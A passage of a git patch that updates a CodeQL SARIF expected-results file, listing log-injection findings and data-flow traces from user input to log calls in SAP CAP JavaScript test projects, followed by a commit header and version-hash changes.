"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e05b39891dddd161:1", + "primaryLocationStartColumnFingerprint" : "40" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 20 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 25 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 13, + "endColumn" : 25 + } + }, + "message" : { + "text" : "$" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + }, + "message" : { + "text" : "$" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + } ], + "newlineSequences" : [ "\r\n", "\n", "
", "
" ], + "columnKind" : "utf16CodeUnits", + "properties" : { + "codeqlConfigSummary" : { + "disableDefaultQueries" : false, + "queries" : [ { + "type" : "builtinSuite", + "uses" : "security-extended" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" + } ] + }, + "metricResults" : [ { + "rule" : { + "id" : "js/summary/lines-of-code", + "index" : 101, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-code", + "value" : 2973 + }, { + "rule" : { + "id" : "js/summary/lines-of-user-code", + "index" : 102, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-user-code", + "value" : 2973, + "baseline" : 0 + } ], + "semmle.formatSpecifier" : "sarif-latest" } + } ] } From cef7d21c0c9a3ba75b3651f5697bdd4fadba6387 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 17:40:29 +0200 Subject: [PATCH 10/15] Update sarif file --- .github/workflows/javascript.sarif.expected | 27772 +----------------- 1 file changed, 793 insertions(+), 26979 deletions(-) diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected index 0c1fa0705..f462b80fc 100644 --- a/.github/workflows/javascript.sarif.expected +++ b/.github/workflows/javascript.sarif.expected @@ -44,7 +44,7 @@ }, "extensions" : [ { "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.2.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "semanticVersion" : "0.2.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", "rules" : [ { "id" : "js/cap-sql-injection", "name" : "js/cap-sql-injection", @@ -127,7 +127,7 @@ } ] }, { "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.6.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "semanticVersion" : "0.6.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", "rules" : [ { "id" : "js/ui5-xss", "name" : "js/ui5-xss", @@ -3152,7 +3152,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/codeql-config.yaml", + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 7 } @@ -3178,7 +3178,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : 